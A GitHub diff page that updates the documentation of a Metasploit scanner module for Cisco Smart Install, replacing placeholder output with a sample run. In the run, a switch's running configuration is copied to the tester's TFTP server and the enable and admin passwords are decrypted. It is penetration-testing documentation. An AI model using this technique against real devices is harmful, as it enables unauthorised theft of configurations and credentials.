File tree Expand file tree Collapse file tree 1 file changed +9
-9
lines changed
documentation/modules/auxiliary/scanner/misc Expand file tree Collapse file tree 1 file changed +9
-9
lines changed Original file line number Diff line number Diff line change @@ -47,15 +47,15 @@ msf auxiliary(cisco_smart_install) > run
47
47
Using the ` DOWNLOAD ` action
48
48
49
49
```
50
- msf auxiliary(cisco_smart_install) > run
51
- [*] a.b.c.d:4786 - Starting TFTP Server...
52
- [+] a.b.c.d:4786 - Fingerprinted the Cisco Smart Install protocol
53
- [*] a.b.c.d:4786 - Requesting configuration from device...
54
- [*] a.b.c.d:4786 - Waiting 60 seconds for configuration
55
- [*] a.b.c.d:4786 - Incoming file from a.b.c.d - GZjWgnqv 3015 bytes
56
- [*] a.b.c.d:4786 - Providing some time for transfers to complete...
57
- [*] a.b.c.d:4786 - Shutting down the TFTP service...
50
+ [*] 192.168.0.26:4786 - Starting TFTP Server...
51
+ [+] 192.168.0.26:4786 - Fingerprinted the Cisco Smart Install protocol
52
+ [*] 192.168.0.26:4786 - Attempting copy system:running-config tftp://192.168.0.11/kWqjngYF
53
+ [*] 192.168.0.26:4786 - Waiting 60 seconds for configuration
54
+ [*] 192.168.0.26:4786 - Incoming file from 192.168.0.26 - kWqjngYF (31036 bytes)
55
+ [+] 192.168.0.26:4786 - 192.168.0.26:4786 Decrypted Enable Password: testcase
56
+ [+] 192.168.0.26:4786 - 192.168.0.26:4786 Username 'admin' with Decrypted Password: testcase)
57
+ [*] 192.168.0.26:4786 - Providing some time for transfers to complete...
58
+ [*] 192.168.0.26:4786 - Shutting down the TFTP service...
58
59
[*] Scanned 1 of 1 hosts (100% complete)
59
60
[*] Auxiliary module execution completed
60
-
61
61
```
You can’t perform that action at this time.
0 commit comments